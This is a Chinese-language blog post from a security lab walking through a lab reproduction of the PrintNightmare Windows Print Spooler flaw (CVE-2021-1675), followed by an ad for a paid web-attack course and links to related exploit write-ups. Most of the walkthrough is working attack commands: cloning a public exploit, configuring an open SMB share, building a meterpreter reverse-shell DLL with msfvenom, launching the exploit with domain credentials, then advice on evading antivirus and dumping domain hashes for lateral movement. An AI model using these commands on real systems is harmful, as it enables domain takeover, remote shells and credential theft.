微軟通殺漏洞-CVE-2021-1675復現

2022-01-04 Ms08067安全實驗室

文章來源|MS08067安全實驗室

本文作者:龍諾(Web知識星球追洞小組)


一  準備環境

實驗環境:windows2019 (192.168.189.145)

kali linux (192.168.189.146)

需要:一個普通的域帳戶

需要:開啟 print spooler服務

使用反彈shell :需要關閉windows2019的安全中心 或者用免殺

需要:windows2019安裝smb1協議(沒有這個會報錯)

二 搭建環境安裝impacket

我這裡使用的是python虛擬環境安裝搭建這樣的好處是不破壞系統環境,因為python有時候安裝各種模塊多了容易衝突所一我們使用虛擬環境。

構造虛擬環境

virtualenv -p python3 文件夾

如果沒有virtualenv的話需要你pip安裝模塊

構造完成以後我們使用

source 文件夾/bin/activate

進入後我們去github下載poc安裝

git clone https://github.com/cube0x0/CVE-2021-1675.git git clone https://github.com/cube0x0/impacket

首先要下載poc impacket模塊然後安裝

因為我們使用的是虛擬環境所以我們可以直接安裝安裝完以後切換到poc處就可以了

source 文件夾/bin/activate python setup.py install python CVE-2021-1675.py -h

配置smb伺服器

[global] workgroup = workgroup server string = test netbios name = MZ security = user map to guest = Bad User smb ports = 445 log file = /var/log/samba/log.%m max log size = 5 min protocol = SMB2

[smb] comment = Samba browseable = yes writeable = yes public = yes path = /tmp/ read only = no guest ok = yes

按照這個配置以後就可以使用impacket-smbserver 文件名、目錄、開啟伺服器,如圖

生成dll和啟動msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.189.146 LPORT=4444 -f dll -o /tmp/rever.dll msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp exploit

利用漏洞

python CVE-2021-1675.py demonba.xxx/yuce:Hello7p@192.168.189.145 '\\192.168.189.146\smb\rever.dll'

如果出錯則需要安裝smb1在windows2019上出錯代碼,下圖

可以現在2019連接smb伺服器出現這種報錯

成功,下圖

impacket-smbserver伺服器也會有數據交互

同時會有反彈shell

我們可以直接查看域中帳戶hash 進行橫向滲透

dll文件在windows

上傳成功,如果開著windows安全中心會出現圖

上傳不成功

這裡就要考慮免殺了,切記只能是普通帳戶

漏洞掃描

https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare


總結

需要了解smb配置

windows2019域配置

在kali無法連接2019的時候逆向思考看看2019可以連接smb共享文件碼?

https://github.com/cube0x0/CVE-2021-1675/issues/36 這裡也有人問這個問題我不知道他解決了嗎?

我是受下面一句話很長時間突然開悟了2019可以連結嗎?

復現看著簡單但是各種環境問題還有小白配置問題只有復現了才知道!

追洞小組負責人Taoing主講

WEB高級攻防實戰班 第1期  來襲


課程圍繞:外圍打點、邊界突破、PHP審計、SRC漏洞挖掘、應急響應

*大綱僅作為參考,會根據當期進度有所變化(加客服獲取高清課程導圖)

每期班定價2999第一期班首發價:2499前50名送365元Web安全知識星球名額),每個報名學員都可享受一次免費的重聽權益,一次沒學懂就再來一遍,後續培訓可任選一期來聽。請有意參加培訓的學員抓緊報名!

支持支付寶、信用卡、花唄分期,對公轉帳,可開發票!

前50名報名同學,送365元Web知識星球名額,可提前先行學習Web安全相關知識,並提供課程中需要的相關軟體和環境。

每周一、二、三、四的晚上 19:00-21:00 ,共24天,48課時,為期6周。如果無法準時參加直播課程,在線培訓的每節課程都會被錄製成視頻上傳到學員區,可隨時下載觀看。
培訓採用在線直播+隨堂錄播+微信群解答的形式,無需等待,報名後立即進入「Web星球」開始預習。Taoing:MS08067安全實驗室核心成員,Web安全知識星球合伙人,安恆信息安全高級工程師,擅長企業安全研究、情報分析、滲透測試,安全開發。

TtssGkf:MS08067安全實驗室核心成員,Web安全知識星球合伙人,Defcon Group 86021議題分享者,致力於漏洞分析、代碼審計、漏洞挖掘。

詳情諮詢請聯繫小客服

掃描下方二維碼加入星球學習

加入後邀請你進入內部微信群,內部微信群永久有效!

 

 


相關焦點

  • CVE-2021-1675漏洞復現
    Windows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based
  • CVE-2021-1675 分析
    一 漏洞簡介前段時間,微軟公布 Windows PrintNightmare 兩個安全漏洞,分別為CVE-2021-1675和CVE-2021-34527。公布幾天後,minikatz 率先工具化集成了 CVE-2021-1675 和 CVE-2021-34527 的 EXP。
  • CVE-2021-1675/34527:Windows Print Spooler權限提升復現
    收錄於話題 #漏洞復現文章合集Server 2019 (Server Core installation)  * Windows Server 2012 R2 (Server Core installation)* Windows Server 2012 R2* Windows Server 2012 (Server Core installation)* Windows Server 2012* Windows Server 2008
  • 微軟漏洞 Cve-2021-1675復現
    exp連結:https://github.com/cube0x0/CVE-2021-1675直接上exppython3 CVE-2021-1675.py 域名/域普通用戶名:用戶密碼@域控IP smb共享文件的路徑
  • CVE-2021-3156 漏洞復現
    漏洞介紹2021年
  • CVE-2021-40444 Office漏洞復現CS上線
    漏洞概述北京時間9月8日,微軟發布安全通告披露了Microsoft MSHTML 遠程代碼執行漏洞,攻擊者可通過製作惡意的
  • 【賊詳細 | 附PoC工具】Apache HTTPd最新RCE漏洞復現
    >docker部署命令(一):docker pull blueteamsteve/cve-2021-41773:with-cgiddocker run -d -p 7006:80 blueteamsteve/cve-2021-41773:with-cgid
  • CVE-2017-11882 office緩存溢出漏洞復現
    電腦中有9臺電腦用的是盜版,即便激活成功大多也是盜版的授權許可,在如此大的基數下,國內辦公軟體行業市場現狀,office必定屬於前列,所以搜索相關文章,綜合分析,感覺都在說,微軟Office套件最有效的攻擊手段,是基於CVE-2017-11882的漏洞,於是乎找到cve-2017-11882這個漏洞,做漏洞復現,隨有下文。
  • Exchange CVE-2021-26855 漏洞復現
    0x1 漏洞概述CVE-2021-26855 是Exchange中的服務端請求偽造漏洞(SSRF),利用此漏洞的攻擊者能夠發送任意HTTP請求並繞過
  • [漏洞復現] CVE-2017-11882 通殺所有Office版本
    2017年11月14號,微軟推送了常規的安全更新,其中,關於CVE-2017-11882的安全更新引起了圈裡的關注,隨之而來的,便是針對此漏洞的POC攻擊代碼被逐漸公開。各路大神在Twitter和Github上相繼公布自己的POC及對應的漏洞利用姿勢,將這股烈火蔓延到2018年。為什麼這個漏洞會引起這麼大的關注度呢?
  • CVE-2021-42287 域內提權漏洞復現
    CVE-2021-42287 域內提權漏洞復現 漏洞原理:如果獲得了 DC 用戶的TGT
  • CVE-2020-2883漏洞復現
    (CVE-2020-2883、CVE-2020-2884),允許未經身份驗證的攻擊者通過T3協議網絡訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致WebLogic Server被攻擊者接管,從而造成遠程代碼執行。
  • 漏洞分析 | CVE-2021-40444
    >隨著cve-2021-40444的披露,隨機引爆了全球的網絡安全,雖然最近微軟發布了補丁,但是cve-2021-40444的利用卻越發猖狂,本人深入分析了這個漏洞。最後將惡意的url改成我們自己搭建的http server,之後成功復現樣本攻擊環境,並且捕捉到了樣本通過rundll32執行了命令
  • NetLogon 域內提權漏洞(CVE-2020-1472)復現過程
    ,可利用此漏洞獲取域管訪問權限。Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)復現過程
  • CVE-2020-11107:XAMPP任意命令執行漏洞復現
    *,<7.4.40x03環境搭建● 漏洞環境:1.準備一臺裝有window系統的虛擬機,本次復現以windows10系統為例。 2.下載XAMPP,本次復現以7.2.25版本為例,下載地址:連結:https://pan.baidu.com/s/1U2w-5cIysbEIwtF9YYfOsQ 提取碼:oi88其他漏洞版本下載地址:https://sourceforge.net/projects/xampp/files/● 環境安裝和配置:
  • CVE-2021-40444 漏洞深入分析
    x-usc:http://hidusi.com/e273caf2ca371919/mountain.html"可以發現其是指向文件的更新連結從樣本庫眾獲取到mountain.html後,我們打開一看,發現全部都混淆了,基本難辨真假,去混淆也比較簡單因為是js代碼,隨便找個網上去混淆的試試,比如http://jsnice.org/
  • Atlassian Jira 模板注入漏洞(CVE-2019-11581)復現
    漏洞描述Atlassian Jira是企業廣泛使用的項目與事務跟蹤工具,被廣泛應用於缺陷跟蹤、客戶服務、需求收集
  • vulhub漏洞復現練習——phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)
    phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)漏洞復現環境是在kali裡面配置的vulhub
  • Windows版TeamViewer漏洞復現
    近日TeamViewer團隊發布了8-15的全版本的軟體推送,在官方發布的安全公告中,修復了CVE-2020-13699漏洞。該漏洞使得程序無法正確引用其自定義URI處理程序,導致攻擊者可以通過構建惡意的URI,通過精心製作URL將惡意的iframe嵌入到網頁中。
  • Microsoft Windows Defender遠程代碼執行漏洞(CVE-2021-1647)復現
    Windows Defender 在利用內置模擬執行組件掃描可執行文件時,存在一處堆溢出漏洞。影響面評估該漏洞導致的威脅非常嚴重,不過由於Windows Defender具有聯網後自動升級補丁的能力,故該漏洞當前造成的危害影響已經不大。